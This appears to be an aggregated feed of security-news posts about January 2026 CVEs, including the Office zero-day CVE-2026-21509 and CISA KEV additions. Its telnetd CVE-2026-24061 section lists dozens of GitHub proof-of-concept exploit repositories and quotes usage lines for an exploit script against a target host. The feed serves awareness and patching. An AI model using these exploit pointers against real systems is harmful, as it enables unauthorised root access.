Suricata is a network IDS, IPS and NSM engine. Starting in version 8.0.0 and prior to version 8.0.3, Suricata can crash with a stack overflow. Version 8.0.3 patches the issue. As a workaround, use default values for `request-body-limit` and `respo...
π https://www.thehackerwire.com/vulnerability/CVE-2026-22260/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T18:02:23
2 posts
π CVE-2026-23881 - High (7.7)
Kyverno is a policy engine designed for cloud native platform engineering teams. Versions prior to 1.16.3 and 1.15.3 have unbounded memory consumption in Kyverno's policy engine that allows users with policy creation privileges to cause denial of ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23881/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-23881 - High (7.7)
Kyverno is a policy engine designed for cloud native platform engineering teams. Versions prior to 1.16.3 and 1.15.3 have unbounded memory consumption in Kyverno's policy engine that allows users with policy creation privileges to cause denial of ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-23881/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T17:16:14.470000
2 posts
π CVE-2026-24869 - High (8.1)
Use-after-free in the Layout: Scrolling and Overflow component. This vulnerability affects Firefox < 147.0.2.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24869/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24869 - High (8.1)
Use-after-free in the Layout: Scrolling and Overflow component. This vulnerability affects Firefox < 147.0.2.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24869/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T17:16:12.097000
2 posts
π΄ CVE-2026-22039 - Critical (9.9)
Kyverno is a policy engine designed for cloud native platform engineering teams. Versions prior to 1.16.3 and 1.15.3 have a critical authorization boundary bypass in namespaced Kyverno Policy apiCall. The resolved `urlPath` is executed using the K...
π https://www.thehackerwire.com/vulnerability/CVE-2026-22039/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-22039 - Critical (9.9)
Kyverno is a policy engine designed for cloud native platform engineering teams. Versions prior to 1.16.3 and 1.15.3 have a critical authorization boundary bypass in namespaced Kyverno Policy apiCall. The resolved `urlPath` is executed using the K...
π https://www.thehackerwire.com/vulnerability/CVE-2026-22039/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T16:19:42.330000
15 posts
2 repos
π’ Correctif d'urgence de Microsoft pour une zeroβday Office (CVEβ2026β21509) activement exploitΓ©e
π Source: BleepingComputer β Microsoft diffuse des mis...
π cyberveille : https://cyberveille.ch/posts/2026-01-27-correctif-d-urgence-de-microsoft-pour-une-zero-day-office-cve-2026-21509-activement-exploitee/
π source : https://www.bleepingcomputer.com/news/microsoft/microsoft-patches-actively-exploited-office-zero-day-vulnerability/
#CVE_2026_21509 #Microsoft_Office #Cyberveille
Microsoft Office Zero-Day (CVE-2026-21509) - Emergency Patch Issued for Active Exploitation
#CVE_2026_21509
https://thehackernews.com/2026/01/microsoft-issues-emergency-patch-for.html
[VULN] β οΈ"Une faille de Microsoft Office est activement exploitΓ©e par des pirates "
(NdR : cybercriminels et/ou opΓ©rateurs malveillants agissant pour le compte dβune entitΓ© soutenant les intΓ©rΓͺts gΓ©opolitiques dβun Γtat)
"Microsoft alerte sur une nouvelle faille critique dans Office. DΓ©jΓ exploitΓ©e par des cybercriminels, la vulnΓ©rabilitΓ© permet de dΓ©sactiver la sΓ©curitΓ© mise en place par Microsoft. LβΓ©diteur a commencΓ© Γ dΓ©ployer dβurgence un correctif pour Microsoft 365 et les versions rΓ©centes dβOffice.
β¦
Pour protΓ©ger les internautes contre les attaques en cours, Microsoft a dΓ©ployΓ© une mise Γ jour qui Β« corrige la vulnΓ©rabilitΓ© qui contourne les mesures dβattΓ©nuation Β» dβOffice. Les utilisateurs de Microsoft 365 et Microsoft Office sont invitΓ©s Γ installer le correctif sans tarder.
Les utilisateurs dβOffice 2021 et des versions ultΓ©rieures Β« seront automatiquement protΓ©gΓ©s grΓ’ce Γ une modification cΓ΄tΓ© serveur, mais devront redΓ©marrer leurs applications Office pour que cette modification prenne effet Β». Il nβy a donc rien Γ faire, sauf redΓ©marrer vos applications. Enfin, Microsoft nβa pas encore corrigΓ© le tir sur Office 2016 et 2019. En attendant un correctif, Microsoft propose des mesures dβattΓ©nuation Γ ses utilisateurs."
π
https://www.01net.com/actualites/faille-microsoft-office-activement-exploitee-pirates.html
π¬
β¬οΈ
https://vulnerability.circl.lu/vuln/CVE-2026-21509
π
β¬οΈ
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21509
π¬
β¬οΈ
https://infosec.pub/post/41135178
Microsoft Office Zero-Day (CVE-2026-21509) - Emergency Patch Issued for Active Exploitation https://thehackernews.com/2026/01/microsoft-issues-emergency-patch-for.html
##The vulnerability, tracked as CVE-2026-21509, carries a CVSS score of 7.8 out of 10.0. It has been described as a security feature bypass in Microsoft Office. https://thehackernews.com/2026/01/microsoft-issues-emergency-patch-for.html
##Microsoft Office Zero-Day (CVE-2026-21509) - Emergency Patch Issued for Active Exploitation
https://thehackernews.com/2026/01/microsoft-issues-emergency-patch-for.html
##Microsoft a patchΓ© en urgence une faille de sΓ©curitΓ© zero-day dans Office : CVE-2026-21509 https://www.it-connect.fr/microsoft-office-faille-zero-day-cve-2026-21509/ #ActuCybersΓ©curitΓ© #CybersΓ©curitΓ© #VulnΓ©rabilitΓ© #Microsoft #Office
##Microsoft Issues Emergency Patch for Actively Exploited Office Zero-Day
Microsoft released emergency updates for an actively exploited Office zero-day (CVE-2026-21509) that allows attackers to bypass OLE security protections when a user opens a malicious file.
**For everyone using Microsoft Office, this is important and urgent. Hackers attack with malicious MS Office documents. Restart all Microsoft 365 and Office 2021 applications immediately to trigger the service-side security fix. For older versions like Office 2016, apply registry workarounds until Microsoft releases a formal patch.**
#cybersecurity #infosec #attack #activeexploit
https://beyondmachines.net/event_details/microsoft-issues-emergency-patch-for-actively-exploited-office-zero-day-v-8-i-f-4/gD2P6Ple2L
βIn Office 2016 bis Office 2024 (auch LTSC), sowie die Microsoft 365 Apps fΓΌr Unternehmen steckt eine SicherheitslΓΌcke, die aktiv ausgenutzt wird.β
##βΌοΈCISA has added 5 vulnerabilities to the KEV Catalog
https://darkwebinformer.com/cisa-kev-catalog/
CVE-2018-14634: Linux Kernel Integer Overflow Vulnerability
CVE-2025-52691: SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability
CVE-2026-23760: SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability
CVE-2026-24061: GNU InetUtils Argument Injection Vulnerability
CVE-2026-21509: Microsoft Office Security Feature Bypass Vulnerability
##CVE ID: CVE-2026-21509
Vendor: Microsoft
Product: Office
Date Added: 2026-01-26
Notes: Please adhere to Microsoftβs recommended guidelines to address this vulnerability. Implement all final mitigations provided by the vendor for Office 2021, and apply the interim corresponding mitigations for Office 2016 and Office 2019 until the final patch becomes available. For more information please see: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21509 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21509
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21509
βΌοΈ CVE-2026-21509: Reliance on untrusted inputs in a security decision in Microsoft Office allows an unauthorized attacker to bypass a security feature locally
βͺοΈZero Day: Yes; Actively exploited
βͺοΈCVSS: 7.8
βͺοΈCVE Published: Today, January 26th, 2026
Advisory: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21509
Affected Products:
βͺοΈMicrosoft Office 2016 (64-bit edition)
βͺοΈMicrosoft Office 2016 (32-bit edition)
βͺοΈMicrosoft Office LTSC 2024 for 64-bit editions
βͺοΈMicrosoft Office LTSC 2024 for 32-bit editions
βͺοΈMicrosoft Office LTSC 2021 for 32-bit editions
βͺοΈMicrosoft Office LTSC 2021 for 64-bit editions
βͺοΈMicrosoft 365 Apps for Enterprise for 64-bit Systems
βͺοΈMicrosoft 365 Apps for Enterprise for 32-bit Systems
βͺοΈMicrosoft Office 2019 for 64-bit editions
βͺοΈMicrosoft Office 2019 for 32-bit editions
π CVE-2026-21509 - High (7.8)
Reliance on untrusted inputs in a security decision in Microsoft Office allows an unauthorized attacker to bypass a security feature locally.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21509/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##Microsoft releases emergency patch for an Office zero-day
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21509
##updated 2026-01-27T16:16:37.013000
2 posts
π CVE-2026-24875 - High (7.8)
Integer Overflow or Wraparound vulnerability in yoyofr modizer.This issue affects modizer: before 4.1.1.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24875/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24875 - High (7.8)
Integer Overflow or Wraparound vulnerability in yoyofr modizer.This issue affects modizer: before 4.1.1.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24875/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T16:16:36.640000
2 posts
π΄ CVE-2026-24872 - Critical (9.8)
improper pointer arithmetic
vulnerability in ProjectSkyfire SkyFire_548.This issue affects SkyFire_548: before 5.4.8-stable5.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24872/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-24872 - Critical (9.8)
improper pointer arithmetic
vulnerability in ProjectSkyfire SkyFire_548.This issue affects SkyFire_548: before 5.4.8-stable5.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24872/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T16:16:16.037000
2 posts
π΄ CVE-2025-68670 - Critical (9.1)
xrdp is an open source RDP server. xrdp before v0.10.5 contains an unauthenticated stack-based buffer overflow vulnerability. The issue stems from improper bounds checking when processing user domain information during the connection sequence. If ...
π https://www.thehackerwire.com/vulnerability/CVE-2025-68670/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2025-68670 - Critical (9.1)
xrdp is an open source RDP server. xrdp before v0.10.5 contains an unauthenticated stack-based buffer overflow vulnerability. The issue stems from improper bounds checking when processing user domain information during the connection sequence. If ...
π https://www.thehackerwire.com/vulnerability/CVE-2025-68670/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T15:30:38
1 posts
1 repos
π΄ CVE-2026-1470 - Critical (9.9)
n8n contains a critical Remote Code Execution (RCE) vulnerability in its workflow Expression evaluation system. Expressions supplied by authenticated users during workflow configuration may be evaluated in an execution context that is not sufficie...
π https://www.thehackerwire.com/vulnerability/CVE-2026-1470/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T15:30:30
1 posts
1 repos
π CVE-2026-21720 - High (7.5)
Every uncached /avatar/:hash request spawns a goroutine that refreshes the Gravatar image. If the refresh sits in the 10-slot worker queue longer than three seconds, the handler times out and stops listening for the result, so that goroutine block...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21720/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T15:28:07.247000
3 posts
1 repos
βΌοΈCISA has added 5 vulnerabilities to the KEV Catalog
https://darkwebinformer.com/cisa-kev-catalog/
CVE-2018-14634: Linux Kernel Integer Overflow Vulnerability
CVE-2025-52691: SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability
CVE-2026-23760: SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability
CVE-2026-24061: GNU InetUtils Argument Injection Vulnerability
CVE-2026-21509: Microsoft Office Security Feature Bypass Vulnerability
##CVE ID: CVE-2025-52691
Vendor: SmarterTools
Product: SmarterMail
Date Added: 2026-01-26
Notes: https://www.smartertools.com/smartermail/release-notes/current ; https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-124/ ; https://nvd.nist.gov/vuln/detail/CVE-2025-52691
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2025-52691
CISA has updated the KEV catalogue.
CVE-2026-24061: GNU InetUtils Argument Injection Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-24061
CVE-2026-23760: SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-23760
CVE-2025-52691: SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability https://www.cve.org/CVERecord?id=CVE-2025-52691
CVE-2018-14634: Linux Kernel Integer Overflow Vulnerability https://www.cve.org/CVERecord?id=CVE-2018-14634 #CISA #Linux #infosec #vulnerability #GNU
##updated 2026-01-27T14:59:34.073000
1 posts
π CVE-2025-41727 - High (7.8)
A local low privileged attacker can bypass the authentication of the Device Manager user interface, allowing them to perform privileged operations and gain administrator access.
π https://www.thehackerwire.com/vulnerability/CVE-2025-41727/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T14:59:34.073000
1 posts
π CVE-2026-24828 - High (7.5)
Missing Release of Memory after Effective Lifetime vulnerability in Is-Daouda is-Engine.This issue affects is-Engine: before 3.3.4.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24828/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T14:59:34.073000
1 posts
1 repos
π΄ CVE-2026-24830 - Critical (9.8)
Integer Overflow or Wraparound vulnerability in Ralim IronOS.This issue affects IronOS: before v2.23-rc2.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24830/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T14:59:34.073000
1 posts
1 repos
π CVE-2026-21721 - High (8.1)
The dashboard permissions API does not verify the target dashboard scope and only checks the dashboards.permissions:* action. As a result, a user who has permission management rights on one dashboard can read and modify permissions on other dashbo...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21721/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T14:59:34.073000
1 posts
1 repos
π CVE-2026-24470 - High (8.1)
Skipper is an HTTP router and reverse proxy for service composition. Prior to version 0.24.0, when running Skipper as an Ingress controller, users with permissions to create an Ingress and a Service of type ExternalName can create routes that enab...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24470/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T14:59:34.073000
1 posts
1 repos
π CVE-2025-14459 - High (8.5)
A flaw was found in KubeVirt Containerized Data Importer (CDI). This vulnerability allows a user to clone PersistentVolumeClaims (PVCs) from unauthorized namespaces, resulting in unauthorized access to data via the DataImportCron PVC source mechan...
π https://www.thehackerwire.com/vulnerability/CVE-2025-14459/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T12:31:24
1 posts
π CVE-2025-41726 - High (8.8)
A low privileged remote attacker can execute arbitrary code by sending specially crafted calls to the web service of the Device Manager or locally via an API and can cause integer overflows which then may lead to arbitrary code execution within pr...
π https://www.thehackerwire.com/vulnerability/CVE-2025-41726/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T12:31:24
1 posts
1 repos
π CVE-2026-24827 - High (7.5)
Out-of-bounds Write vulnerability in gerstrong Commander-Genius.This issue affects Commander-Genius: before Release refs/pull/358/merge.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24827/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T10:15:48.420000
1 posts
updated 2026-01-27T06:30:18
1 posts
1 repos
π CVE-2026-1361 - High (7.8)
ASDA-Soft Stack-based Buffer Overflow Vulnerability
π https://www.thehackerwire.com/vulnerability/CVE-2026-1361/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T00:32:17
2 posts
1 repos
π CVE-2026-24523 - High (7.5)
Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Marcus (aka @msykes) WP FullCalendar wp-fullcalendar allows Retrieve Embedded Sensitive Data.This issue affects WP FullCalendar: from n/a through <= 1.6.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24523/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24523 - High (7.5)
Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Marcus (aka @msykes) WP FullCalendar wp-fullcalendar allows Retrieve Embedded Sensitive Data.This issue affects WP FullCalendar: from n/a through <= 1.6.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24523/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T00:31:13
1 posts
π CVE-2026-24536 - High (7.5)
Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in webpushr Webpushr webpushr-web-push-notifications allows Retrieve Embedded Sensitive Data.This issue affects Webpushr: from n/a through <= 4.38.0.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24536/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-27T00:31:13
1 posts
1 repos
π΄ CVE-2026-24531 - Critical (9.8)
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Select-Themes Prowess prowess allows PHP Local File Inclusion.This issue affects Prowess: from n/a through <= 2.3.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24531/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T23:43:30
1 posts
New.
NIST: CVE-2026-24656: Deserialization of Untrusted Data vulnerability in Apache Karaf Decanter https://nvd.nist.gov/vuln/detail/CVE-2026-24656 #infosec #vulnerability #Apache #NIST
##updated 2026-01-26T23:40:20
1 posts
Apache Hadoop HDFS Native Client Vulnerability
Apache Hadoop's HDFS native client contains a vulnerability (CVE-2025-27821) that allows attackers to cause system crashes or data corruption through an out-of-bounds write.
**If you are using Hadoop HDFS native client, plan an update. The flaw isn't immiediately exploited, so prioritize isolating and limiting who can access the Hadoop cluster using that client. Then plan an update to 3.4.2**
#cybersecurity #infosec #advisory #databreach
https://beyondmachines.net/event_details/apache-hadoop-hdfs-native-client-vulnerability-s-e-u-o-v/gD2P6Ple2L
updated 2026-01-26T23:36:20
1 posts
1 repos
π CVE-2026-24490 - High (8.1)
MobSF is a mobile application security testing tool used. Prior to version 4.4.5, a Stored Cross-site Scripting (XSS) vulnerability in MobSF's Android manifest analysis allows an attacker to execute arbitrary JavaScript in the context of a victim'...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24490/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T23:28:06
2 posts
1 repos
π CVE-2026-24486 - High (8.6)
Python-Multipart is a streaming multipart parser for Python. Prior to version 0.0.22, a Path Traversal vulnerability exists when using non-default configuration options `UPLOAD_DIR` and `UPLOAD_KEEP_FILENAME=True`. An attacker can write uploaded f...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24486/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24486 - High (8.6)
Python-Multipart is a streaming multipart parser for Python. Prior to version 0.0.22, a Path Traversal vulnerability exists when using non-default configuration options `UPLOAD_DIR` and `UPLOAD_KEEP_FILENAME=True`. An attacker can write uploaded f...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24486/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T23:16:10.440000
1 posts
1 repos
π CVE-2026-24534 - High (8.8)
Missing Authorization vulnerability in uPress Booter booter-bots-crawlers-manager allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Booter: from n/a through <= 1.5.7.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24534/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T23:16:10.283000
1 posts
1 repos
π CVE-2026-24532 - High (8.8)
Missing Authorization vulnerability in SiteLock SiteLock Security sitelock allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects SiteLock Security: from n/a through <= 5.0.2.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24532/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T23:16:09.643000
2 posts
π CVE-2026-24524 - High (8.1)
Missing Authorization vulnerability in Essekia Tablesome tablesome allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Tablesome: from n/a through <= 1.1.35.2.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24524/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24524 - High (8.1)
Missing Authorization vulnerability in Essekia Tablesome tablesome allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Tablesome: from n/a through <= 1.1.35.2.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24524/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T21:31:38
2 posts
1 repos
π΄ CVE-2026-22582 - Critical (9.8)
Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability in Salesforce Marketing Cloud Engagement (MicrositeUrl module) allows Web Services Protocol Manipulation. This issue affects Marketing Cloud Engagemen...
π https://www.thehackerwire.com/vulnerability/CVE-2026-22582/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-22582 - Critical (9.8)
Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability in Salesforce Marketing Cloud Engagement (MicrositeUrl module) allows Web Services Protocol Manipulation. This issue affects Marketing Cloud Engagemen...
π https://www.thehackerwire.com/vulnerability/CVE-2026-22582/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T21:31:38
2 posts
π΄ CVE-2026-22585 - Critical (9.8)
Use of a Broken or Risky Cryptographic Algorithm vulnerability in Salesforce Marketing Cloud Engagement (CloudPages, Forward to a Friend, Profile Center, Subscription Center, Unsub Center, View As Webpage modules) allows Web Services Protocol Mani...
π https://www.thehackerwire.com/vulnerability/CVE-2026-22585/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-22585 - Critical (9.8)
Use of a Broken or Risky Cryptographic Algorithm vulnerability in Salesforce Marketing Cloud Engagement (CloudPages, Forward to a Friend, Profile Center, Subscription Center, Unsub Center, View As Webpage modules) allows Web Services Protocol Mani...
π https://www.thehackerwire.com/vulnerability/CVE-2026-22585/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T21:30:35
2 posts
1 repos
π CVE-2026-24538 - High (7.6)
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in omnipressteam Omnipress omnipress allows PHP Local File Inclusion.This issue affects Omnipress: from n/a through <= 1.6.6.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24538/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24538 - High (7.6)
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in omnipressteam Omnipress omnipress allows PHP Local File Inclusion.This issue affects Omnipress: from n/a through <= 1.6.6.
π https://www.thehackerwire.com/vulnerability/CVE-2026-24538/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-01-26T21:30:32
13 posts
38 repos
https://github.com/ms0x08-dev/CVE-2026-24061-POC
https://github.com/monstertsl/CVE-2026-24061
https://github.com/m3ngx1ng/cve_2026_24061_cli
https://github.com/Alter-N0X/CVE-2026-24061-POC
https://github.com/leonjza/inetutils-telnetd-auth-bypass
https://github.com/FurkanKAYAPINAR/CVE-2026-24061-telnet2root
https://github.com/LucasPDiniz/CVE-2026-24061
https://github.com/DeadlyHollows/CVE-2026-24061-setup
https://github.com/Lingzesec/CVE-2026-24061-GUI
https://github.com/BrainBob/Telnet-TestVuln-CVE-2026-24061
https://github.com/SafeBreach-Labs/CVE-2026-24061
https://github.com/midox008/CVE-2026-24061
https://github.com/yanxinwu946/CVE-2026-24061--telnetd
https://github.com/XsanFlip/CVE-2026-24061-Scanner
https://github.com/typeconfused/CVE-2026-24061
https://github.com/Chocapikk/CVE-2026-24061
https://github.com/madfxr/Twenty-Three-Scanner
https://github.com/xuemian168/CVE-2026-24061
https://github.com/parameciumzhang/Tell-Me-Root
https://github.com/BrainBob/CVE-2026-24061
https://github.com/hackingyseguridad/root
https://github.com/z3n70/CVE-2026-24061
https://github.com/SystemVll/CVE-2026-24061
https://github.com/cyberpoul/CVE-2026-24061-POC
https://github.com/androidteacher/CVE-2026-24061-PoC-Telnetd
https://github.com/balgan/CVE-2026-24061
https://github.com/duy-31/CVE-2026-24061---telnetd
https://github.com/Mr-Zapi/CVE-2026-24061
https://github.com/cumakurt/tscan
https://github.com/JayGLXR/CVE-2026-24061-POC
https://github.com/infat0x/CVE-2026-24061
https://github.com/punitdarji/telnetd-cve-2026-24061
https://github.com/h3athen/CVE-2026-24061
https://github.com/novitahk/Exploit-CVE-2026-24061
https://github.com/TryA9ain/CVE-2026-24061
https://github.com/Gabs-hub/CVE-2026-24061_Lab
βΌοΈCISA has added 5 vulnerabilities to the KEV Catalog
https://darkwebinformer.com/cisa-kev-catalog/
CVE-2018-14634: Linux Kernel Integer Overflow Vulnerability
CVE-2025-52691: SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability
CVE-2026-23760: SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability
CVE-2026-24061: GNU InetUtils Argument Injection Vulnerability
CVE-2026-21509: Microsoft Office Security Feature Bypass Vulnerability
##βΌοΈCVE-2026-24061: Telnet RCE Exploit
GitHub: https://github.com/SafeBreach-Labs/CVE-2026-24061
This script exploits the CVE-2026-24061 vulnerability in Telnet servers using a malformed USER environment variable.
CVSS: 9.8
Usage:
python telnet_rce.py <host> [-p <port>]
Arguments:
host: Target IP address or hostname (required)
-p, --port: Target port (default: 23)
Example:
python telnet_rce.py 192.168.1.100
python telnet_rce.py example.com -p 23
CVE ID: CVE-2026-24061
Vendor: GNU
Product: InetUtils
Date Added: 2026-01-26
Notes: This vulnerability could affect an open-source component, third-party library, protocol, or proprietary implementation that could be used by different products. For more information, please see: https://cgit.git.savannah.gnu.org/cgit/inetutils.git ; https://codeberg.org/inetutils/inetutils/commit/ccba9f748aa8d50a38d7748e2e60362edd6a32cc; https://codeberg.org/inetutils/inetutils/commit/fd702c02497b2f398e739e3119bed0b23dd7aa7b ; https://nvd.nist.gov/vuln/detail/CVE-2026-24061
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-24061
CISA has updated the KEV catalogue.
CVE-2026-24061: GNU InetUtils Argument Injection Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-24061
CVE-2026-23760: SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-23760
CVE-2025-52691: SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability https://www.cve.org/CVERecord?id=CVE-2025-52691
CVE-2018-14634: Linux Kernel Integer Overflow Vulnerability https://www.cve.org/CVERecord?id=CVE-2018-14634 #CISA #Linux #infosec #vulnerability #GNU
##The telnetd vuln has a CVE now - CVE-2026-24061
Proof of concept: https://github.com/SafeBreach-Labs/CVE-2026-24061/blob/main/telnet_rce.py
##11-Year-Old critical telnetd flaw found in GNU InetUtils (CVE-2026-24061) https://securityaffairs.com/187255/security/11-year-old-critical-telnetd-flaw-found-in-gnu-inetutils-cve-2026-24061.html
##Global: US, Ukraine, and Russia held talks in Abu Dhabi on Jan 24. Israel conducts a large-scale operation for the last hostage in Gaza.
Tech: Apple's iOS 26 update faces user complaints of bugs and battery drain (Jan 25). NVIDIA plans high-performance ARM chips for Q2 2026.
Cybersecurity: A critical GNU InetUtils telnetd vulnerability (CVE-2026-24061) is actively exploited for root access (Jan 24). New DynoWiper malware was used in a failed Sandworm attack on Poland's power sector (Jan 24).
##GNU InetUtils telnetd Authentication Bypass Exploited in the Wild
A critical authentication bypass in GNU InetUtils telnetd (CVE-2026-24061) is actively exploited only days after the public reporting of the flaw. It's urgent that you block any telnet server you are using from the Internet.
**THIS IS URGENT! Check if you are using Telnet anywhere in your network. IMMEDIATELY isolate the Telnet interface to trusted networks and patch the code. Then stop using Telnet and switch to SSH.**
#cybersecurity #infosec #attack #activeexploit
https://beyondmachines.net/event_details/gnu-inetutils-telnetd-authentication-bypass-exploited-in-the-wild-8-f-f-u-3/gD2P6Ple2L
oh lol - 2026 - 9.8er (critical) CVE im *telnetd* :D (CVE-2026-24061)
##@distrowatch There's a critical vulnerability in the server side, CVE-2026-24061, to do with environment handling - see https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-telnetd-auth-bypass-flaw-to-get-root/
##Telnet RCE Exploit https://github.com/SafeBreach-Labs/CVE-2026-24061
##Hackers are now getting instant root access to thousands of legacy devices with a single Telnet handshakeβno password needed. The flaw is shockingly simple and already being exploited. How safe are your old systems?
##updated 2026-01-26T21:30:29
3 posts
1 repos
βΌοΈCISA has added 5 vulnerabilities to the KEV Catalog
https://darkwebinformer.com/cisa-kev-catalog/
CVE-2018-14634: Linux Kernel Integer Overflow Vulnerability
CVE-2025-52691: SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability
CVE-2026-23760: SmarterTools SmarterMail Authentication Bypass Using an Alternate Path or Channel Vulnerability
CVE-2026-24061: GNU InetUtils Argument Injection Vulnerability
CVE-2026-21509: Microsoft Office Security Feature Bypass Vulnerability
